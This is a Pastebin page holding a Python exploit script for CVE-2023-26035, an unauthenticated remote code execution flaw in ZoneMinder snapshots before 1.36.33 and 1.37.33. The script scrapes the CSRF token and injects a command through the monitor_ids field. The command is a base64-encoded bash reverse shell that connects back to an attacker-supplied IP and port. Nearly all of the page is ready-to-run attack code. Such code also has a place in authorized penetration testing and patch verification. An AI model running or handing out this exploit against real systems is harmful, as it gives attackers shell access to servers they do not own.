API tools faq
paste
FlyFar

ZoneMinder Snapshots < 1.37.33 - Unauthenticated RCE - CVE-2023-26035

FlyFar
Mar 21st, 2024
44
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.36 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. import re
  2. import requests
  3. from bs4 import BeautifulSoup
  4. import argparse
  5. import base64
  6.  
  7. # Exploit Title: Unauthenticated RCE in ZoneMinder Snapshots
  8. # Date: 12 December 2023
  9. # Discovered by : @Unblvr1
  10. # Exploit Author: Ravindu Wickramasinghe (@rvizx9)
  11. # Vendor Homepage: https://zoneminder.com/
  12. # Software Link: https://github.com/ZoneMinder/zoneminder
  13. # Version: prior to 1.36.33 and 1.37.33
  14. # Tested on: Arch Linux, Kali Linux
  15. # CVE : CVE-2023-26035
  16. # Github Link : https://github.com/rvizx/CVE-2023-26035
  17.  
  18.  
  19. class ZoneMinderExploit:
  20.     def __init__(self, target_uri):
  21.         self.target_uri = target_uri
  22.         self.csrf_magic = None
  23.  
  24.     def fetch_csrf_token(self):
  25.         print("[>] fetching csrt token")
  26.         response = requests.get(self.target_uri)
  27.         self.csrf_magic = self.get_csrf_magic(response)
  28.         if response.status_code == 200 and re.match(r'^key:[a-f0-9]{40},\d+', self.csrf_magic):
  29.             print(f"[>] recieved the token: {self.csrf_magic}")
  30.             return True
  31.         print("[!] unable to fetch or parse token.")
  32.         return False
  33.  
  34.     def get_csrf_magic(self, response):
  35.         return BeautifulSoup(response.text, 'html.parser').find('input', {'name': '__csrf_magic'}).get('value', None)
  36.  
  37.     def execute_command(self, cmd):
  38.         print("[>] sending payload..")
  39.         data = {'view': 'snapshot', 'action': 'create', 'monitor_ids[0][Id]': f';{cmd}', '__csrf_magic': self.csrf_magic}
  40.         response = requests.post(f"{self.target_uri}/index.php", data=data)
  41.         print("[>] payload sent" if response.status_code == 200 else "[!] failed to send payload")
  42.  
  43.     def exploit(self, payload):
  44.         if self.fetch_csrf_token():
  45.             print(f"[>] executing...")
  46.             self.execute_command(payload)
  47.  
  48. if __name__ == "__main__":
  49.     parser = argparse.ArgumentParser()
  50.     parser.add_argument('-t', '--target-url', required=True, help='target url endpoint')
  51.     parser.add_argument('-ip', '--local-ip', required=True, help='local ip')
  52.     parser.add_argument('-p', '--port', required=True, help='port')
  53.     args = parser.parse_args()
  54.  
  55.     # generating the payload
  56.     ps1 = f"bash -i >& /dev/tcp/{args.local_ip}/{args.port} 0>&1"  
  57.     ps2 = base64.b64encode(ps1.encode()).decode()
  58.     payload = f"echo {ps2} | base64 -d | /bin/bash"
  59.  
  60.     ZoneMinderExploit(args.target_url).exploit(payload)
  61.            
Tags: Exploit Vulnerability Zoneminder RCE csrf
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!